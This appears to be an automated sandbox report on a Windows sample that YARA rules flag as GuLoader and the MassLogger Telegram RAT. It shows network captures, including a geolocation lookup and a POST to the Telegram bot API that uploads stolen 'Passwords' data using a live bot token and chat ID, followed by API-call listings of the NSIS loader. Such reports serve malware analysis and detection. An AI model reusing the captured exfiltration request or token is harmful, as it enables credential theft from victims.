2025-01-10 23:04:21 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:04:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1865050 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwMAZ%2FNsZ45YSQeDE5oCU1hajkTwdnU5P3PfNmWzUsIEIEGemPjk4XjfMoX2hYWy4fHmX4b8vVRYbwfP18%2F460bk9fCd8BMBBZ71scVPQdeDXi8PLadSs%2FHNqnq6y2kV6Hb6o8vS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90004e3e888841ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1641371&cwnd=192&unsent_bytes=0&cid=ad50d3d4ea9cc605&ts=147&x=0"
2025-01-10 23:04:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49784	149.154.167.220	443	1476	C:\Users\user\Desktop\WGi85dsMNp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:04:27 UTC	296	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31a138391b77 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 23:04:27 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 31 33 38 33 39 31 62 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31a138391b77Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 23:04:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 23:04:28 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 23:04:28 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 35 30 32 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43692,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736550268,"document":{"file_n

Target ID:	0
Start time:	18:03:58
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\WGi85dsMNp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WGi85dsMNp.exe"
Imagebase:	0x400000
File size:	979'348 bytes
MD5 hash:	2275024102505F0997F027C71970750D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:04:09
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\WGi85dsMNp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WGi85dsMNp.exe"
Imagebase:	0x400000
File size:	979'348 bytes
MD5 hash:	2275024102505F0997F027C71970750D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.1%
Total number of Nodes:	1592
Total number of Limit Nodes:	38

Executed Functions

Function 004034A5 Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\WGi85dsMNp.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

TMP, xrefs: 00403735
TEMP, xrefs: 0040372D
NSIS Error, xrefs: 00403567
Error launching installer, xrefs: 004037D0
C:\Users\user\Desktop\WGi85dsMNp.exe, xrefs: 004038F8
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
SeShutdownPrivilege, xrefs: 0040396F
~nsu, xrefs: 00403845
C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 004037F6
C:\Users\user\Desktop, xrefs: 0040386C, 00403871, 0040389E
\Temp, xrefs: 004036FF
Low, xrefs: 0040371B
.tmp, xrefs: 00403861
C:\Users\user\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
1033, xrefs: 00403749

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Iw\Unnumberable$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WGi85dsMNp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-1262075901
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,?), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

N, xrefs: 00405057
M, xrefs: 00404F76
, xrefs: 00405385

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 6F941B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6F94121B: GlobalAlloc.KERNEL32(00000040,?,6F94123B,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F941225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F941C6B
lstrcpyW.KERNEL32(00000008,?), ref: 6F941CB3
lstrcpyW.KERNEL32(00000808,?), ref: 6F941CBD
GlobalFree.KERNEL32(00000000), ref: 6F941CD0
GlobalFree.KERNEL32(?), ref: 6F941DB2
GlobalFree.KERNEL32(?), ref: 6F941DB7
GlobalFree.KERNEL32(?), ref: 6F941DBC
GlobalFree.KERNEL32(00000000), ref: 6F941FA6
lstrcpyW.KERNEL32(?,?), ref: 6F942140
GetModuleHandleW.KERNEL32(00000008), ref: 6F9421B5
LoadLibraryW.KERNEL32(00000008), ref: 6F9421C6
GetProcAddress.KERNEL32(?,?), ref: 6F942220
lstrlenW.KERNEL32(00000808), ref: 6F94223A

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 5a975ffe5543903f1e5573e555ee20ca4072420e39d85aa07c5ade09c9915ce4
Instruction ID: 79a88eb7cb7090d4daed0a8da4221da37701b81b13c34e406d3773e2d9d82e9c
Opcode Fuzzy Hash: 5a975ffe5543903f1e5573e555ee20ca4072420e39d85aa07c5ade09c9915ce4
Instruction Fuzzy Hash: 27228A71D04209DADB26DFB8C9806EAB7F8FF2A315F10462AD165E61C0D770EAE58F50

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-614058931
Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,?), ref: 00403FF9
